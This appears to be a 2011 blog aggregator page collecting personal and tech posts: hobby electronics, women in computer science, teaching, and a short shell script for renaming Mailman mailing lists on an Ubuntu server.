I did have the soundbox device I have built with me at Alternative Party 2011. It did attract a fair amount of interest, though nowhere near what my 32×8 LED screen did. I think I'll have to write a post about that LED screen and how it works some time. For quick info, it's built around an ATmega328, can show 16 different shades of green with gamma ramp and shows some classical effects such as plasma and fire.

Neither one of my projects gained nowhere near the interest that the Chernobyl reactor simulator by Helsinki Hacklab did, but that is only to be expected. That simulator was awesome, even though they didn't quite manage to get it to a playable state during the event.

November 21, 2011 08:20 PM

I recently came up with what I thought was interesting event idea.  Our Dean of Engineering had expressed some interest in CU-WISE coming up with an idea for a recruitment event that would attract the media and encourage high school girls to consider choosing Carleton in their upcoming university applications.  I haven't heard back from the Dean so I am not sure if this event will happen, but I thought I'd share the idea in case it helped any of you come up with your own.

View this post and more at The Female Perspective of Computer Science.

November 18, 2011 10:00 AM

And the above happened after I killed all my sim cards, American phone plan, and turned off all social media notifications.

Now it time to do Marking all over the world. There is little need to print new propaganda unless you need mass market growth, but is that even good?

Muji can’t handle the Marking Revolution!

The US Global Entry program too, just pwnd into a Fabricatorz brochure showing off the four horseman projects of Fabricatorz.

November 16, 2011 11:19 AM

In an age where to be female was to be weak, there was one woman who would finally show the world that the fairer sex could beat the very best men academically, even in something so male dominated as mathematics. And she did it while still maintaining a rather balanced lifestyle.

View this post and more at The Female Perspective of Computer Science.

November 16, 2011 10:52 AM

Inspired by recent Planet Ubuntu posts, I submit a QR Code for your examination:

© 2011, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.

November 16, 2011 03:08 AM

I've attended the Grace Hopper Celebration of Women in Computing (GHC) every year since 2008, gradually increasing my participation from blogging to being on a conference committee.  This year I had to miss out because I am past my flight cut-off for my pregnancy.  For a long time I was so busy trying to get stuff done for school before I start my leave in January that I didn't even think about it, but once the conference got started this week I felt very sad to be missing out.

View this post and more at The Female Perspective of Computer Science.

November 11, 2011 03:25 PM

I love coding.  Once I get started, I get lost in the groove very easily.  I love thinking about the best way to organize objects and design my UI.  It feels good to find elegant ways to solve problems.  So the fact that I haven't done a lot of programming lately really frustrates me.

View this post and more at The Female Perspective of Computer Science.

November 08, 2011 10:42 AM

It's hard to believe that our baby's due date is less than 8 weeks away.  It's even harder to believe I've written so little about it here! What with trying to get as much done as I can before going on leave after Christmas, I haven't really thought that much about the whole baby thing.

View this post and more at The Female Perspective of Computer Science.

November 06, 2011 03:21 PM

If you're a professor or TA for a course and want to use online technology for the betterment of your students, which is superior: a course wiki or a course blog? I've been using the latter for the course I'm TA'ing this term, but think the real answer depends on exactly what you hope to get out of it.

View this post and more at The Female Perspective of Computer Science.

November 02, 2011 02:01 PM

For all the nerds out there, here is a lil script I wrote with some help for being able to rename lists, especially if you are having trouble with aliases generated from your setup. Mailman is simple in using just the folder path names for a list to generate aliases and more. The setup for Fabricatorz is ubuntu latest with mailman and postfix. Have it with the script, and let me know if you make some changes or have problems:

#!/bin/sh
#
# A quick way to rename mailman lists and trust me you aren't going to find
# a better way to do this on ubuntu server
#

OLD="$1"
NEW="$2"

echo $OLD
echo $NEW

/etc/init.d/mailman stop
test -d /var/lib/mailman/archives/private/${NEW} && echo '*** That mailing list name already exists. ***' && exit 1

mv /var/lib/mailman/lists/${OLD} /var/lib/mailman/lists/${NEW}
test -d /var/lib/mailman/archives/private/${OLD} && mv /var/lib/mailman/archives/private/${OLD} /var/lib/mailman/archives/private/${NEW}
mv /var/lib/mailman/archives/private/${OLD}.mbox /var/lib/mailman/archives/private/${NEW}.mbox
test -d /var/lib/mailman/archives/private/${NEW}.mbox/${OLD}.mbox && mv /var/lib/mailman/archives/private/${NEW}.mbox/${OLD}.mbox /var/lib/mailman/archives/private/${NEW}.mbox/${NEW}.mbox && /var/lib/mailman/bin/arch ${NEW} /var/lib/mailman/archives/private/${NEW}.mbox/${NEW}.mbox

newaliases
/var/lib/mailman/bin/genaliases
/etc/init.d/postfix restart
/etc/init.d/mailman start
exit 0

I’m still a nerd.

October 30, 2011 08:40 AM

Last week I did a couple of workshops at the Canadian Museum of Science and Technology for National Science and Technology Week.  I managed to improve the usual 'computer science connects to everything' theme to be more interactive, and judging by the apparent engagement of the students, it was a success.  Below is an outline of what I presented - feel free to adapt it for your own presentation (with some credit to me if you don't mind).

View this post and more at The Female Perspective of Computer Science.

October 28, 2011 12:49 PM